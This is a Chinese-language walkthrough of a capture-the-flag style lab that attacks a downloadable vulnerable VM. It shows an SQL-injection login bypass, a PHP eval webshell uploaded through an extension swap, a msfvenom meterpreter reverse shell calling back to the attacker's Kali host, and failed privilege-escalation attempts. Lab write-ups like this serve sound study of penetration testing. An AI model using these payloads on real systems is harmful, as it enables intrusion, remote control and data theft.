环境介绍
主机 | IP(NAT) |
---|---|
kali | 192.168.252.128 |
靶机2 | 未知 |
靶机下载:https://pan.baidu.com/s/1u5xbmU13wheXE4_M508qFw
提取码:1234
打开靶机
主机探测
NAT网卡位于192.168.252.0/24网段
进行主机探测
netdiscover -i eth0 -r 192.168.252.0/24
信息收集
访问web界面
没有发现可疑渗透点,这里使用目录爆破,看一下有没有隐藏界面。
dirb http://192.168.252.129/
发现有uplaods
再使用AWVS扫描器进行扫描,
AWVS安装方法:https://blog.csdn.net/qq_39583774/article/details/118766805
结构扫描到login界面
查看源代码
意思是只能以@btrisk.com结尾
使用万能密码绕过最后使用’OR 1=1#@btrisk.com成功绕过
账号:'OR 1=1#@btrisk.com
密码随便
发现上传点
尝试上传文件
这里提示只能上传jpg,png格式。
修改扩展名上传
失败过程
发现上传成功,由此得到并没有对内容过滤。
写入一句话木马
<?php @eval($_POST['pass']);?>
记得把扩展名改为png或者jpg
使用burp修改扩展名为php
点击发送
点击运行木马
使用中国菜刀连接
成功反弹shell,查看权限
这里应该是制作靶机的人失误了,直接把数据库密码写在这里。
但是菜刀一直卡在这里,可以放弃这种方式,去查找提权脚本。
在kali中开启apache2服务把脚本上传到html目录下
在靶机中的高权限目录中下载提权脚本
这里提权脚本一直卡着,不知道是什么问题,有人知道什么问题可以解决一下。
另辟蹊径
使用kali进行制作木马连接。
在kali中开启监听模块。
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.252.128
run
制作木马文件
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.252.128 lport=4444 -f raw > muma.php
在菜刀中删除刚刚上传的木马,再次上传。
修改扩展名上传
点击运行
回到kali此时kali已经反弹shell
输入shell进入shell
使用python调用本地shell
python -c "import pty;pty.spawn('/bin/bash')"
到这里发现应该是提权脚本把数据库文件删除了,此时数据库服务已经挂了gg。
只能重新开一个一样的虚拟机,直接使用kali登录数据库。
成功过程
成功进入系统
修改完密码就可以登录了。
这里使用提权脚本会删库,我尝试过使用脏牛提权发现也会失败,不知道什么原因,有知道的望告知,谢谢了!!!